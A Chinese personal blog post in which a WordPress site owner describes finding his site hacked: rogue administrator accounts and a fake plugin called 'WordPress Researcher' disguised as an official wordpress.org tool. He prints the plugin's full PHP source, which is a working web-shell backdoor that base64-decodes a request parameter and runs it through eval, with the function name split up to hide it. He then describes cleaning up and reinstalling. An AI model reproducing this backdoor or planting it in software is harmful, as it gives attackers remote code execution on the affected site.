被黑了?

2014.11.21 | | 0 Comment

早上起来,帮嫦子发了篇文章。选择作者的时候,发现多了几个不知名(肯定不是我自己注册的、另外也关闭注册了的)的作者,吓了一跳。

检查了一遍,数据没丢失,那些管理员全部都是2010年3月19号注册的。检查插件,发现多了一个叫 WordPress Researcher 的东东(文件最后修改日期是20141113)。哎,杯具了。就这么个破站,有啥好搞的呢?

lots-of-admin


WordPress Researcher

那插件就一个文件,附上代码,不知道有啥用。

<?php
/*
Plugin Name: WordPress Researcher
Plugin URI: http://wordpress.org/extend/plugins/
Description: WordPress research tool.
Author: wordpressdotorg
Author URI: http://wordpress.org/
Text Domain: wordpress-researcher
License: GPL version 2 or later - http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version: 2.2.4
*/
function research_plugin()
{
if (isset($_REQUEST['X3PN']))
{
$myfunc = 'bas'.'e64_'.'dec'.'ode';
$myvar = $myfunc($_REQUEST['X3PN']);
eval($myvar);
}
return;
}

add_action('after_setup_theme', 'research_plugin');
?>

程序文件全部删掉了,导出了xml,数据库也不要了,重新安装导入了文章和评论内容,主题也重新检查了一遍,折腾大半天,终于又差不多回复原貌了。才发现,友链忘了备份了!又得手工整理一遍,累!

——最近更新:2015年9月10日
支付宝扫码打赏微信打赏

如果文章对您有帮助,欢迎移至上方按钮打赏老杨

声明: 除非注明,常阳时光文章均为原创,转载请以链接形式标明本文地址
本文地址:https://cyhour.com/135/

Comments:0

发表留言